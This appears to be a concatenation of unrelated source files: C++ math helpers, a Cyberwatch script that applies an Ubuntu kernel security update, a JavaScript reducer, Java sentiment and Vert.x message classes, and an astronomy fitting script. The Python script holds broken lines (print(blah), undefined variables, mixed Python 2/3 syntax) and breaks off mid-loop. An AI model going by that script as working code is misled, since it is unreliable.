smFunc(is_nan, smLambda {
if(args.empty() || args[0]->type != ObjectType::FLOAT)
return makeFalse();
return makeBool(std::isnan(args[0]->f));
})
smFunc(is_inf, smLambda {
if(args.empty() || args[0]->type != ObjectType::FLOAT)
return makeFalse();
return makeBool(std::isinf(args[0]->f));
})
smFunc(deg, smLambda {
if(args[0]->type == ObjectType::FLOAT)
return makeFloat(args[0]->f / DOUBLE_PI * 360.f);
else if(args[0]->type == ObjectType::INTEGER)
return makeFloat(args[0]->i / DOUBLE_PI * 360.f);
return Object();
})
smFunc(rad, smLambda {
if(args[0]->type == ObjectType::FLOAT)
return makeFloat(args[0]->f / 360.f * DOUBLE_PI);
else if(args[0]->type == ObjectType::INTEGER)
return makeFloat(args[0]->i / 360.f * DOUBLE_PI);
return Object();
})
smReturnBox
}
}
}
|
#!/bin/sh
# CYBERWATCH SAS - 2017
#
# Security fix for USN-2929-2
#
# Security announcement date: 2016-03-14 00:00:00 UTC
# Script generation date: 2017-01-01 21:05:16 UTC
#
# Operating System: Ubuntu 12.04 LTS
# Architecture: x86_64
#
# Vulnerable packages fix on version:
# - linux-image-3.13.0-83-generic-lpae:3.13.0-83.127~precise1
# - linux-image-3.13.0-83-generic:3.13.0-83.127~precise1
# - linux-image-3.13.0-83-generic-lpae:3.13.0-83.127~precise1
# - linux-image-3.13.0-83-generic:3.13.0-83.127~precise1
#
# Last versions recommanded by security team:
# - linux-image-3.13.0-83-generic-lpae:3.13.0-83.127~precise1
# - linux-image-3.13.0-83-generic:3.13.0-83.127~precise1
# - linux-image-3.13.0-83-generic-lpae:3.13.0-83.127~precise1
# - linux-image-3.13.0-83-generic:3.13.0-83.127~precise1
#
# CVE List:
# - CVE-2016-3134
# - CVE-2013-4312
# - CVE-2015-7566
# - CVE-2015-7833
# - CVE-2016-0723
# - CVE-2016-2384
# - CVE-2016-2543
# - CVE-2016-2544
# - CVE-2016-2545
# - CVE-2016-2546
# - CVE-2016-2547
# - CVE-2016-2548
# - CVE-2016-2549
# - CVE-2016-2782
# - CVE-2016-3134
# - CVE-2013-4312
# - CVE-2015-7566
# - CVE-2015-7833
# - CVE-2016-0723
# - CVE-2016-2384
# - CVE-2016-2543
# - CVE-2016-2544
# - CVE-2016-2545
# - CVE-2016-2546
# - CVE-2016-2547
# - CVE-2016-2548
# - CVE-2016-2549
# - CVE-2016-2782
#
# More details:
# - https://www.cyberwatch.fr/vulnerabilites
#
# Licence: Released under The MIT License (MIT), See LICENSE FILE
sudo apt-get install --only-upgrade linux-image-3.13.0-83-generic-lpae=3.13.0-83.127~precise1 -y
sudo apt-get install --only-upgrade linux-image-3.13.0-83-generic=3.13.0-83.127~precise1 -y
sudo apt-get install --only-upgrade linux-image-3.13.0-83-generic-lpae=3.13.0-83.127~precise1 -y
sudo apt-get install --only-upgrade linux-image-3.13.0-83-generic=3.13.0-83.127~precise1 -y
|
read -p "?" -n 1 -r
if [[ $REPLY =~ ^[Yy]$ ]]
then
...
fi
|
<reponame>josebright/tulip_foundation_website
import { Press } from '../constant';
const initialState = {
loading: false,
Press: [],
message: null,
error: null,
};
const PressReducer = (state = initialState, action) => {
switch (action.type) {
case Press.PRESS_REQUEST:
return {
...state,
loading: true,
};
case Press.PRESS_SUCCESS:
// console.log(action);
return {
...state,
loading: false,
Press: action.payload,
// randomPress: RemoveFirstThree(action.payload),
};
case Press.PRESS_FAILED:
// console.log(action);
return {
...state,
loading: false,
error: action.payload,
};
default:
return state;
}
};
export default PressReducer;
|
<reponame>groupon/nakala
/*
Copyright (c) 2013, Groupon, Inc.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
Neither the name of GROUPON nor the names of its contributors may be
used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
package com.groupon.nakala.sentiment;
import org.apache.lucene.search.spans.SpanQuery;
import java.io.IOException;
import java.util.*;
import java.util.regex.Pattern;
/**
* @author <EMAIL>
*/
public final class VocabularyReview extends AbstractVocabulary {
public static final String AMBIANCE = "ambiance";
public static final String AQUARIUM = "aquarium";
public static final String BALCONY = "balcony";
public static final String BALLET = "ballet";
public static final String BASEBALL = "baseball";
public static final String BASE = "base";
public static final String BEACH = "beach";
public static final String BIKE = "bike";
public static final String BOWL = "bowl";
public static final String CLEANLINESS = "cleanliness";
public static final String CLOTHING = "clothing";
public static final String DIVING = "diving";
public static final String DYNAMICFEAT = "dynamicfeat";
public static final String FAMILY = "family";
public static final String FOOD = "food";
public static final String GIRLSGETAWAY = "girlsgetaway";
public static final String GOLF = "golf";
public static final String HIKE = "hike";
public static final String JEWELRY = "jewelry";
public static final String LOBBY = "lobby";
public static final String LOCATION_AIRPORT = "location_airport";
public static final String LOCATION = "location";
public static final String LOUNGE = "lounge";
public static final String LUXURY = "luxury";
public static final String MARKET = "market";
public static final String MUSEUM = "museum";
public static final String NIGHTLIFE = "nightlife";
public static final String OCEAN = "ocean";
public static final String OVERALL = "overall";
public static final String PARKING = "parking";
public static final String PET = "pet";
public static final String PLAYGROUND = "playground";
public static final String QUIET = "quiet";
public static final String ROMANCE = "romance";
public static final String ROOMCOMFORTABLE = "roomcomfortable";
public static final String ROOMSERVICE = "roomservice";
public static final String ROOMSIZE = "room_size";
public static final String SIGHTSEEING = "sightseeing";
public static final String SKI = "ski";
public static final String SPA = "spa";
public static final String STAFF = "staff";
public static final String SWIM = "swim";
public static final String THEMEPARK = "themepark";
public static final String TRANSPORTATION = "transportation";
public static final String VALUE = "value";
public static final String VIEW = "view";
public static final String WATERSPORTS = "watersports";
public static final String WOMALONE = "womalone";
public static final String WOULDRETURN = "would_return";
public static final String ZOO = "zoo";
private static final String FEATURES = "FEATURES";
private static final String PROHIBITED = "PROHIBITED";
private static final String PLUS_ONE = "PLUS_ONE";
private static final String PLUS_HALF = "PLUS_HALF";
private static final String MINUS_HALF = "MINUS_HALF";
private static final String MINUS_ONE = "MINUS_ONE";
private SpanQuery featuresSQ, prohibitedSQ, plusOneSQ, minusOneSQ;
private SpanQuery featuresTitleSQ, prohibitedTitleSQ, plusOneTitleSQ,
minusOneTitleSQ;
private VocabularyReview(String vocabName) {
super(vocabName);
}
public static VocabularyReview newInstance(String vocabName) throws IOException {
VocabularyReview vr = new VocabularyReview(vocabName);
vr.vocabPath = vr.vocabPath + "review/";
vr.labels = Collections.synchronizedSet(new HashSet<String>());
vr.labels.add(FEATURES);
vr.labels.add(PROHIBITED);
vr.labels.add(PLUS_ONE);
vr.labels.add(MINUS_ONE);
vr.wordsOfInterest = Collections.synchronizedSet(new HashSet<Pattern>());
vr.queryMapContents = Collections.synchronizedMap(new HashMap<String, Set<SpanQuery>>());
vr.queryMapContents.put(FEATURES, new HashSet<SpanQuery>());
vr.queryMapContents.put(PROHIBITED, new HashSet<SpanQuery>());
vr.queryMapContents.put(PLUS_ONE, new HashSet<SpanQuery>());
vr.queryMapContents.put(PLUS_HALF, new HashSet<SpanQuery>());
vr.queryMapContents.put(MINUS_ONE, new HashSet<SpanQuery>());
vr.queryMapContents.put(MINUS_HALF, new HashSet<SpanQuery>());
vr.queryMapTitle = Collections.synchronizedMap(new HashMap<String, Set<SpanQuery>>());
vr.queryMapTitle.put(FEATURES, new HashSet<SpanQuery>());
vr.queryMapTitle.put(PROHIBITED, new HashSet<SpanQuery>());
vr.queryMapTitle.put(PLUS_ONE, new HashSet<SpanQuery>());
vr.queryMapTitle.put(PLUS_HALF, new HashSet<SpanQuery>());
vr.queryMapTitle.put(MINUS_ONE, new HashSet<SpanQuery>());
vr.queryMapTitle.put(MINUS_HALF, new HashSet<SpanQuery>());
Set<String> fields = Collections.synchronizedSet(new HashSet<String>());
fields.add(FEATURES);
fields.add(PROHIBITED);
fields.add(PLUS_ONE);
fields.add(PLUS_HALF);
fields.add(MINUS_ONE);
fields.add(MINUS_HALF);
vr.readVocabFile(vr.domain, fields, null, ExcerptIndexer.CONTENTS, vr.queryMapContents);
vr.readVocabFile(vr.domain, fields, null, ExcerptIndexer.TITLE, vr.queryMapTitle);
return vr;
}
@Override
public String toString() {
StringBuffer sb = new StringBuffer();
String[] labelList = {FEATURES, PROHIBITED, PLUS_ONE, PLUS_HALF,
MINUS_HALF, MINUS_ONE};
for (String l : labelList) {
if (queryMapContents.get(l).isEmpty()) {
continue;
}
List<SpanQuery> entries = Collections.synchronizedList(new ArrayList<SpanQuery>(queryMapContents
.get(l)));
sb.append(l + '\n');
for (SpanQuery e : entries) {
sb.append(" " + e.toString() + '\n');
}
sb.append('\n');
}
return sb.toString();
}
private SpanQuery getQuery(SpanQuery sq, Map<String, Set<SpanQuery>> queryMapContents, String field) {
if (sq == null) {
sq = VocabUtils.buildQueryFromSpanQuerySet(queryMapContents.get(field));
}
return sq;
}
public SpanQuery getFeatures() {
return getQuery(featuresSQ, queryMapContents, FEATURES);
}
public SpanQuery getProhibited() {
return getQuery(prohibitedSQ, queryMapContents, PROHIBITED);
}
public SpanQuery getAttitudePlusOne() {
return getQuery(plusOneSQ, queryMapContents, PLUS_ONE);
}
public SpanQuery getAttitudeMinusOne() {
return getQuery(minusOneSQ, queryMapContents, MINUS_ONE);
}
public SpanQuery getFeaturesTitle() {
return getQuery(featuresTitleSQ, queryMapTitle, FEATURES);
}
public SpanQuery getProhibitedTitle() {
return getQuery(prohibitedTitleSQ, queryMapTitle, PROHIBITED);
}
public SpanQuery getAttitudePlusOneTitle() {
return getQuery(plusOneTitleSQ, queryMapTitle, PLUS_ONE);
}
public SpanQuery getAttitudeMinusOneTitle() {
return getQuery(minusOneTitleSQ, queryMapTitle, MINUS_ONE);
}
public static void main(String[] args) throws Exception {
VocabularyReview vocab = VocabularyReview
.newInstance(VocabularyReview.FAMILY);
System.out.println("==========\nfamily\n==========");
System.out.print(vocab.toString());
vocab = VocabularyReview.newInstance(VocabularyReview.AMBIANCE);
System.out.println("\n\n==========\nambiance\n==========");
System.out.print(vocab.toString());
vocab = VocabularyReview.newInstance(VocabularyReview.NIGHTLIFE);
System.out.println("\n\n==========\nnightlife\n==========");
System.out.print(vocab.toString());
vocab = VocabularyReview.newInstance(VocabularyReview.SPA);
System.out.println("\n\n==========\nspa\n==========");
System.out.print(vocab.toString());
}
}
|
package org.vertx.java.core.cluster;
import org.jboss.netty.util.CharsetUtil;
import org.vertx.java.core.buffer.Buffer;
import org.vertx.java.core.logging.Logger;
import org.vertx.java.core.net.NetSocket;
import org.vertx.java.core.net.ServerID;
/**
* <p>Represents a message sent on the event bus.</p>
*
* @author <a href="http://tfox.org"><NAME></a>
*/
public class Message extends Sendable {
private static final Logger log = Logger.getLogger(Message.class);
/**
* The unique id of the message - this is filled in by the event bus when the message is sent
*/
public String messageID;
/**
* The address where the message is being sent
*/
public String address;
/**
* The body (payload) of the message
*/
public final Buffer body;
ServerID sender;
boolean requiresAck;
EventBus bus;
/**
* Create a new Message
* @param address The address to send the message to
* @param body
*/
public Message(String address, Buffer body) {
this.address = address;
this.body = body;
}
/**
* Acknowledge receipt of this message. If the message was sent specifying a receipt handler, that handler will be
* called when all receivers have called acknowledge. If the message wasn't sent specifying a receipt handler
* this method does nothing.
*/
public void acknowledge() {
if (bus != null && requiresAck) {
bus.acknowledge(sender, messageID);
}
}
Message(Buffer readBuff) {
// TODO Meh. This could be improved
int pos = 1;
int messageIDLength = readBuff.getInt(pos);
pos += 4;
byte[] messageIDBytes = readBuff.getBytes(pos, pos + messageIDLength);
pos += messageIDLength;
messageID = new String(messageIDBytes, CharsetUtil.UTF_8);
int addressLength = readBuff.getInt(pos);
pos += 4;
byte[] addressBytes = readBuff.getBytes(pos, pos + addressLength);
pos += addressLength;
address = new String(addressBytes, CharsetUtil.UTF_8);
int port = readBuff.getInt(pos);
pos += 4;
int hostLength = readBuff.getInt(pos);
pos += 4;
byte[] hostBytes = readBuff.getBytes(pos, pos + hostLength);
pos += hostLength;
String host = new String(hostBytes, CharsetUtil.UTF_8);
sender = new ServerID(port, host);
byte bra = readBuff.getByte(pos);
requiresAck = bra == (byte)1;
pos += 1;
int buffLength = readBuff.getInt(pos);
pos += 4;
byte[] payload = readBuff.getBytes(pos, pos + buffLength);
body = Buffer.create(payload);
}
void write(NetSocket socket) {
int length = 1 + 6 * 4 + address.length() + 1 + body.length() + messageID.length() + sender.host.length();
Buffer totBuff = Buffer.create(length);
totBuff.appendInt(0);
totBuff.appendByte(Sendable.TYPE_MESSAGE);
writeString(totBuff, messageID);
writeString(totBuff, address);
totBuff.appendInt(sender.port);
writeString(totBuff, sender.host);
totBuff.appendByte((byte)(requiresAck ? 1 : 0));
totBuff.appendInt(body.length());
totBuff.appendBuffer(body);
totBuff.setInt(0, totBuff.length() - 4);
socket.write(totBuff);
}
byte type() {
return Sendable.TYPE_MESSAGE;
}
Message copy() {
Message msg = new Message(address, body.copy());
msg.messageID = this.messageID;
msg.sender = this.sender;
msg.requiresAck = this.requiresAck;
return msg;
}
}
|
<reponame>savvytruffle/cauldron
import matplotlib
matplotlib.use('agg')
import sys, itertools, time, os
print(os.uname())
import emcee
from emcee.utils import MPIPool
#from helper_funcs import *
from eb_fitting import *
kic = int(sys.argv[1])
try:
prefix = sys.argv[2]
except:
prefix = '/astro/store/gradscratch/tmp/windemut/eb_fitting_mini/'
prefix = prefix + str(kic)+'/'
#kic = int(float(sys.argv[1]))
#period, tpe, esinw, ecosw, rsum, rrat, b, frat, q1, q2, q3, q4 = np.array(sys.argv[2:-2], dtype=float)
#nwalkers, niter = int(sys.argv[-2]), int(sys.argv[-1])
clobber_lc=False #overwrite LC only fits?
clobber_sed=True #overwrite SED only fits?
kiclist, perlist, pdeplist, sdeplist, morphlist = np.loadtxt('data/kebproperties_0216.dat',
usecols=(0, 1, 3, 4, 8), unpack=True, delimiter=';')
#goodlist = (morphlist<0.6) & (pdeplist>0.1) & (sdeplist>0.01) & (perlist > 1.)
goodlist = (perlist>0)
excludelist = get_excludelist(fname='data/sed_flag_file_0328')
keblat = Keblat(preload=False)
#keblat.loadiso2()
keblat.loadiso2(isoname='isodata_jun4.dat')
keblat.loadsed(sedfile='data/kepsedall_0216.dat')
keblat.loadvkeb(filename='data/kebproperties_0216.dat')
goodlist_ind = np.where(kiclist[goodlist].astype(int) == kic)[0]
if len(goodlist_ind)>1:
goodlist_ind=goodlist_ind[0]
goodv = keblat.kiclookup(kic, target=keblat.vkeb[:, 0])
keblat.loadlc(kic, keblat.vkeb[goodv, [1, 2, 5, 6, 7]], clip_tol=2.0, local_db=True)
keblat.morph = keblat.vkeb[goodv, 8]
magsobs, emagsobs, extinction, glat, z0 = keblat.getmags(kic)
ebv = extinction[0]
if np.isnan(z0):
z0 = keblat.zsun
#print "Loading SED data, excluding ", excludelist[kic]
try:
exclusive = excludelist[kic]
except:
exclusive = []
keblat.isoprep(magsobs, emagsobs, extinction, glat, z0, exclude=exclusive)#exclude=[]) #excludelist[goodlist_ind])#'gmag','rmag','imag','zmag'])
period, tpe = keblat.vkeb[goodv, 1], keblat.vkeb[goodv, 2]
ecosw, esinw = keblat.vkeb[goodv, -2], keblat.vkeb[goodv, -1]
if ecosw == 0: ecosw = 1e-5
if esinw == 0: esinw = 1e-5
frat = (keblat.vkeb[goodv, 4]/keblat.vkeb[goodv, 3])
ebv_arr, ebv_sig, ebv_dist_bounds, ebv_bounds = None, None, None, None#get3dmap(kic)
if keblat.swidth < 0.:
print "No secondary eclipses detected. Exiting."
sys.exit()
#if np.median(np.unique(keblat.crowd)) < 0.5:
# print "Crowding > 0.5. Exiting."
# sys.exit()
if (max(keblat.pwidth, keblat.swidth) > 0.04) and (keblat.pwidth+keblat.swidth > 0.091):
clip_tol = 1.4
#elif ((keblat.pw3idth > 0.01) and (keblat.swidth > 0.01)) or (keblat.pwidth+keblat.swidth>:
# clip_tol = 1.5
else:
clip_tol = 1.7
print("Clip tolerance = {0}".format(clip_tol))
keblat.updatephase(tpe, period, clip_tol=clip_tol)
check_dir_exists(prefix)
keblat.start_errf(prefix+'lcfit.err')
# rvdata = np.loadtxt('data/{0}.rv'.format(kic), delimiter=';')
# uncomment the code segment below if want to fit RV
# //load rv data
# //make init guess for masses + K offset
# m1, m2, k0 = keblat.rvprep(rvdata[:,0], rvdata[:,1], rvdata[:,3], rvdata[:,2], rvdata[:,4])
# //run light-curve opt first
# //make sure keblat.pars are updated...
# lcmod, lcpol = keblat.lcfit(opt_lcpars, keblat.jd[keblat.clip].....)
# //update the bounds to make them stricter
# keblat.updatebounds('period', 'tpe', 'esinw', 'ecosw')
# rvpars = [m1+m2, m2/m1, opt_lcpars[3], opt_lcpars[4], opt_lcpars[5], opt_lcpars[6], keblat.pars['inc'], k0, 0]
# //optimize rvparameters using opt_lc + init rv guesses
# opt_rvpars = opt_rv(msum=m1+m2, mrat=m2/m1, period=opt_lcpars[3], tpe=opt_lcpars[4], esinw=opt_lcpars[5],
# ecosw=opt_lcpars[6], inc=keblat.pars['inc'], k0=k0, rverr=0)
# //fix msum from rv fit to lc fit
# opt_lcpars[0] = opt_rvpars[0]
# lcpars2 = opt_lc(opt_lcpars, keblat.jd, keblat.phase, keblat.flux, keblat.fluxerr, keblat.crowd, keblat.clip, set_upperb = 2.0, vary_msum=False)
# //then optimize both simultaneously
#opt_lcrvpars = opt_lcrv(keblat,msum=opt_rvpars[0], mrat=opt_rvpars[1],
# rsum=lcpars2[1], rrat=lcpars2[2], period=lcpars2[3],
# tpe=lcpars2[4], esinw=lcpars2[5], ecosw=lcpars2[6],
# b=lcpars2[7], frat=lcpars2[8], q1=lcpars2[-4],
# q2=lcpars2[-3], q3=lcpars2[-2], q4=lcpars2[-1],
# lcerr=0.0, k0=opt_rvpars[-2], rverr=0.)
q1, q2, q3, q4 = 0.01, 0.01, 0.01, 0.01
age, h0, dist = 9.2, 119., 850.
chunks = identify_gaps(keblat.cadnum, retbounds_inds=True)
chunks = np.delete(chunks, np.where(np.diff(chunks)<2)[0])
lcchi2_threshold = 5./np.nanmedian(np.array([np.nanmedian(abs(keblat.flux[chunks[ii]:chunks[ii+1]] -
np.nanmedian(keblat.flux[chunks[ii]:chunks[ii+1]])))
for ii in range(len(chunks)-1)]))
keblat.pars['lcerr'] = 1e-5
print(blah)
################################### LC FITTING ########################################
if not os.path.isfile(prefix+'lcpars.lmfit2') or clobber_lc:
# make initial guesses for rsum and f2/f1, assuming main sequence equal mass binary
rsum = scipy.optimize.fmin_l_bfgs_b(estimate_rsum, 1.0,
args=(period, 2*(keblat.pwidth+keblat.swidth)),
bounds=[(1e-3, 1e3)], approx_grad=True)[0][0]
# ew = scipy.optimize.fmin(tse_residuals, np.array([1e-3, ecosw]),
# args=(period, tpe, tpe+keblat.sep*period))
b = flatbottom(keblat.phase[keblat.clip], keblat.flux[keblat.clip], keblat.sep, keblat.swidth)
rrat = guess_rrat(sdeplist[goodlist][goodlist_ind], pdeplist[goodlist][goodlist_ind])
frat = rrat**(2.5)
if rsum > 10:
msum = 2.0
else:
msum = rsum
ew_trials = [[esinw, ecosw], [-esinw, ecosw]]
for jj in np.linspace(0.01, .5, 5):
ew_trials = ew_trials + [[jj, ecosw], [-jj, ecosw]]
#[[esinw, ecosw], [-esinw, ecosw], [-0.521, ecosw], [-0.332, ecosw], [-0.142, ecosw], [0.521, ecosw], [0.332, ecosw], [0.142, ecosw], [-.2]]
lcpars0 = np.array([msum, rsum, rrat, period, tpe, esinw, ecosw, b, frat, q1, q2, q3, q4])
ew = ew_search_lmfit(ew_trials, keblat, lcpars0, (period, tpe, tpe+keblat.sep*period), fit_ecosw=False, polyorder=1)
b_trials = [0.01, 0.1, 0.4, 0.8, 1.2]
rrat_trials = [0.3, 0.7, 0.95]
b_trials = [b] + [float(jj) for jj in np.array(b_trials)[~np.in1d(b_trials, b)]]
rrat_trials = [rrat] + [float(jj) for jj in np.array(rrat_trials)[~np.in1d(rrat_trials, rrat)]]
lc_search_counts=0
bestlcchi2 = 1e25
###################################################################################
########################### LC ONLY OPTIMIZATION FIRST ############################
###################################################################################
keblat.updatebounds('period', 'tpe', partol=0.1)
# if pdeplist[goodlist][goodlist_ind]<0.1:
# keblat.parbounds['rrat'] = [1e-6, 1.]
# keblat.parbounds['frat'] = [1e-8, 1.]
if sdeplist[goodlist][goodlist_ind] < 0.08 and pdeplist[goodlist][goodlist_ind] < 0.08:
keblat.parbounds['rrat'] = [1e-6, 1]
keblat.parbounds['frat'] = [1e-8, 1]
if abs(ecosw) < 0.015:
keblat.parbounds['ecosw'] = [-0.02, 0.02]
keblat.parbounds['esinw'] = [-.9, .9]
else:
keblat.updatebounds('ecosw', partol=0.1)
keblat.parbounds['esinw'] = [-np.sqrt(.9**2-ecosw**2), np.sqrt(.9**2-ecosw**2)]
for i_b, i_rrat, i_ew in list(itertools.product(b_trials, rrat_trials, [ew, [esinw, ecosw]])):
# for i_b, i_rrat, i_ew in list(itertools.product(b_trials, rrat_trials, [[esinw, ecosw]])):
# lcpars0 = np.array([rsum, rsum, i_rrat, period, tpe, ew[0], ew[1], i_b, i_rrat**(2.5),
# q1, q2, q3, q4])
#upper_b = 2.*i_b if i_b==0.01 else 3.0
#keblat.parbounds['b'][1] = upper_b
opt_lcpars0 = opt_lc(keblat, msum=msum, rsum=rsum, rrat=i_rrat, period=period, tpe=tpe, esinw=i_ew[0],
ecosw=i_ew[1], b=i_b, frat=i_rrat**2.5, q1=q1, q2=q2, q3=q3, q4=q4)
lcchi2 = np.sum(rez(opt_lcpars0, keblat, polyorder=2)**2)/(np.sum(keblat.clip) - len(opt_lcpars0) - 1)
if (lcchi2 < bestlcchi2) or (lc_search_counts < 1):
print "Saving from this run:", lcchi2, bestlcchi2, lc_search_counts
bestlcchi2 = lcchi2*1.0
opt_lcpars = opt_lcpars0.copy()
lc_search_counts+=1
if (bestlcchi2 <= 1.5) and opt_lcpars[2]<=1.0:
print "These init b, rrat, esinw, ecosw lcpars are: ", i_b, i_rrat, ew
break
# opt_lcpars0 = opt_lc(lcpars0, keblat.jd, keblat.phase, keblat.flux, keblat.fluxerr, keblat.crowd, \
# keblat.clip, set_upperb=upper_b, prefix=prefix)
# lcchi2 = np.sum(rez(opt_lcpars0, polyorder=2)**2)/np.sum(keblat.clip)
# if lcchi2 < bestlcchi2:
# bestlcchi2 = lcchi2*1.0
# opt_lcpars = opt_lcpars0 * 1.0
# make_lc_plots(kic, opt_lcpars0, prefix, polyorder=2, suffix='lc_opt')
try:
keblat.plot_lc(opt_lcpars, prefix, polyorder=2, suffix='lc_opt2', savefig=True)
except Exception, e:
print str(e)
if bestlcchi2 < lcchi2_threshold:
print "Saving lmfit lcpars..."
np.savetxt(prefix+'lcpars.lmfit2', opt_lcpars)
else:
print("Bestlcchi2 = {0}, exiting.".format(bestlcchi2))
np.savetxt(prefix+'lcpars.lmfit2', opt_lcpars)
sys.exit()
else:
print "Loading lcpars lmfit"
opt_lcpars = np.loadtxt(prefix+'lcpars.lmfit2')
bestlcchi2 = np.sum(rez(opt_lcpars[:13], keblat, polyorder=2)**2)/(np.sum(keblat.clip) - len(opt_lcpars) - 1)
msum, rsum, rrat, period, tpe, esinw, ecosw, b, frat, q1, q2, q3, q4 = opt_lcpars[:13]
#opt_lcpars0 = opt_lc(keblat, msum=msum, rsum=rsum, rrat=rrat, period=period,
# tpe=tpe, esinw=esinw, ecosw=ecosw, b=b, frat=frat, q1=q1,
# q2=q2, q3=q3, q4=q4, vary_msum=False, fit_crowd=True)
opt_lcpars0 = opt_lc_crowd(keblat, msum=msum, rsum=rsum, rrat=rrat, period=period,
tpe=tpe, esinw=esinw, ecosw=ecosw, b=b, frat=frat,
q1=q1, q2=q2, q3=q3, q4=q4, vary_msum=False)
crowd_fits = keblat.broadcast_crowd(keblat.quarter, opt_lcpars0[13:])
keblat.crowd = crowd_fits
lcchi2 = np.sum(rez(opt_lcpars0[:13], keblat, polyorder=2)**2)/(np.sum(keblat.clip) - len(opt_lcpars0) - 1)
if (lcchi2 < bestlcchi2) and ((abs(opt_lcpars0[13:]-1)<1e-8).sum() < 1):
print "Saving from this crowding fit run:", lcchi2, bestlcchi2
bestlcchi2 = lcchi2*1.0
opt_lcpars = opt_lcpars0[:13].copy()
crowd = opt_lcpars0[13:]
np.savetxt(prefix+'lcpars_wcrowd.lmfit2', opt_lcpars0)
else:
crowd_fits = keblat.broadcast_crowd(keblat.quarter, keblat._crowdsap)
keblat.crowd = crowd_fits
crowd = keblat._crowdsap.ravel()
_, _ = keblat.lcfit(opt_lcpars[:13], keblat.jd, keblat.quarter, keblat.flux, keblat.dflux, keblat.crowd, polyorder=0)
keblat.updatephase(keblat.pars['tpe'], keblat.pars['period'], clip_tol=keblat.clip_tol)
opt_lcpars = np.append(opt_lcpars, np.log(np.median(abs(np.diff(keblat.flux)))))
####################### RV FITS ##########################
t, rv1, rv1err, rv2, rv2err = np.loadtxt('/astro/users/windemut/cauldron/data/{}.rv'.format(kic), usecols=(2,3,4,5,6), unpack=True)
esinw_array = np.sort(np.concatenate((np.linspace(0.1, 0.6, 4), -np.linspace(0.1, 0.6, 4), [0])))
for ii in range(len(esinw_array)):
for jj in range(len(esinw_array)):
if jj==0:
lw=3
else:
lw=1
_rvpars = rvpars.copy()
_rvpars[4] = esinw_array[ii]
_rvpars[5] = esinw_array[jj]
rvmod = keblat.rvfit(_rvpars, rvt)
print('C{}-'.format(ii), '{}'.format(1-jj/10.), '{}'.format(esinw_array[ii]))
plt.plot(np.linspace(0,1,100), rvmod[0], 'C{}-'.format(ii), lw=lw, alpha=1-jj/10., label='{}'.format(esinw_array[ii]))
opt_rvpars = opt_rv(keblat, msum=m1+m2, mrat=m2/m1, period=opt_lcpars[3], tpe=opt_lcpars[4], esinw=opt_lcpars[5], ecosw=opt_lcpars[6], inc=keblat.pars['inc'], k0=k0, rverr=0)
m1, m2, k0 = keblat.rvprep(t, rv1*1e3, rv2*1e3, rv1err*1e3, rv2err*1e3)
def lnprob_lcrv(lcrvpars0, BF_constraint=None, retro=False):
lcrvpars = lcrvpars0.copy()
lp = keblat.lnprior_lcrv(lcrvpars)
if np.isinf(lp):
return -np.inf
if BF_constraint is not None:
lp += -0.5*((lcrvpars[9]-BF_constraint)/0.2)**2
lcrvpars[-1] = np.exp(lcrvpars[-1])
lcrvpars[-3] = np.exp(lcrvpars[-3])
ll = keblat.lnlike_lcrv(lcrvpars, qua=np.unique(keblat.quarter), retro=retro)
if (np.isnan(ll) or np.isinf(ll)):
return -np.inf
return lp + ll
nwalkers=128
niter=100000
clobber=False
BF_ratios = np.array([0.62, 0.77, 0.46, 0.39, 0.997, 0.65, 1./0.89])
BF_ratios_kics = np.array([5285607, 6864859, 6778289, 6449358, 4285087, 6131659, 6781535])
if ((1-keblat.pe_depth)<=0.1 and (1-keblat.se_depth)<=0.1) or (pdeplist[goodlist_ind]<=0.1 and sdeplist[goodlist_ind]<=0.1):
BF_constraint=BF_ratios[BF_ratios_kics==kic][0]
else:
BF_constraint=None
header = prefix+'lcrv_BF{}_'.format(0 if BF_constraint is None else 1)
footer = str(nwalkers)+'x'+str(niter/1000)+'k_final'
mcfile = header+footer+'.mcmc'
pars = opt_lcrvpars.copy()
#pars[-3] = np.log(opt_lcrvpars[-3])
#pars[-1] = np.log(np.nanmedian(keblat.rv1_err_obs))
ndim=len(pars)
p0_scale = np.ones(ndim)*1e-7
p0 = np.array([pars + p0_scale*pars*np.random.randn(ndim) for ii in range(nwalkers)])
for ii in range(ndim):
p0[:,ii] = np.clip(p0[:,ii], keblat.parbounds[parnames_dict['lcrv'][ii]][0], keblat.parbounds[parnames_dict['lcrv'][ii]][1])
ll0 = np.zeros(nwalkers)
for ii in range(nwalkers):
ll0[ii] = lnprob_lcrv(p0[ii,:], BF_constraint=BF_constraint, retro=retro)
if np.any(np.isinf(ll0)):
print("Initial Gaussian ball of parameters yield -inf lnprob, check bounds")
sys.exit()
if os.path.isfile(mcfile) and not clobber:
print("File {0} already exists... do you want to clobber?".format(mcfile))
sys.exit()
outf=open(mcfile, "w")
outf.close()
sampler = emcee.EnsembleSampler(nwalkers, ndim, lnprob_lcrv, threads=4, args=(BF_constraint,retro))
start_time = time.time()
print("Running {0}k MCMC chain".format(niter/1000))
for res in sampler.sample(p0, iterations=niter, storechain=False):
if sampler.iterations % 10 == 0:
position = res[0]
outf = open(mcfile, "a")
for k in range(position.shape[0]):
outf.write("{0} {1} {2} {3} {4}\n".format(sampler.iterations,
k, sampler.acceptance_fraction[k], res[1][k],
" ".join([str(ii) for ii in position[k]])))
outf.close()
if sampler.iterations % 10000 == 0:
